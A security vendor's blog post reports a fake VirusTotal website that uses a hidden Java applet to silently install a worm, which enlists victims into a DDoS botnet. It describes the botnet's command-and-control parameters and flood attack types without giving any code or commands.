English
The Internet threat alert status is currently normal. At present, no major epidemics or other serious incidents have been recorded by Kaspersky Lab’s monitoring service. Internet threat level: 1

Fake virustotal website propagated java worm

Jorge Mieres
Kaspersky Lab Expert
Posted May 24, 00:48  GMT
Tags: Botnets, DDoS, JavaScript
0.6
 

The infection strategies using java script technology are on the agenda and that because of his status as a "hybrid", criminals looking to expand its coverage of attack recruiting infected computers regardless of the browser or operating system you use.

In terms of criminal activities, the techniques of Drive-by-Download by injecting malicious java script in different websites, are a combo of social engineering that requires users to increasingly sharpen the senses of "detection".

During this weekend, we encountered a fake website of the popular system analyzes suspicious files Virustotal, by Hispasec company, touted to infect users through the methods mentioned above.

A view of users, the website looks the same way as the original. However, hidden in the source the parameters needed to infect the system through a java applet through which discharge completely silent malware detected by Kaspersky Lab as Worm.MSIL.Arcdoor.ov.

The worm is developed to recruit zombies that will be part of a botnet designed primarily to perform DDoS attacks synflood, httpflood, udpflood and icmpflood. The communication focuses on a C&C that stores information obtained from the victim machine. Some of the parameters involved in the communication are:

& mode: type of DDoS attack

&botver: malware version

&pcname: name victim machine (hostname)

&winver: type and versión of operating system

Usually these attacks through a centralized hub from which the attacker manages malicious maneuvers using web applications DDoS Framework such as N0ise (used in this case), Cythosia, or NOPE. Such applications have a high impact and demand in terms of development, especially since the European zone of Germany.

Kaspersky Lab detects this threat proactive and continues the investigations into these criminal activities.


8 comments

Rod MacPherson

2011 May 25, 18:48
0
 

Re: Why censor these?

'An ounce of prevention is worth a pound of cure'

If you would like to comment on this article you must first
login


Bookmark and Share
Share

Analysis

Blog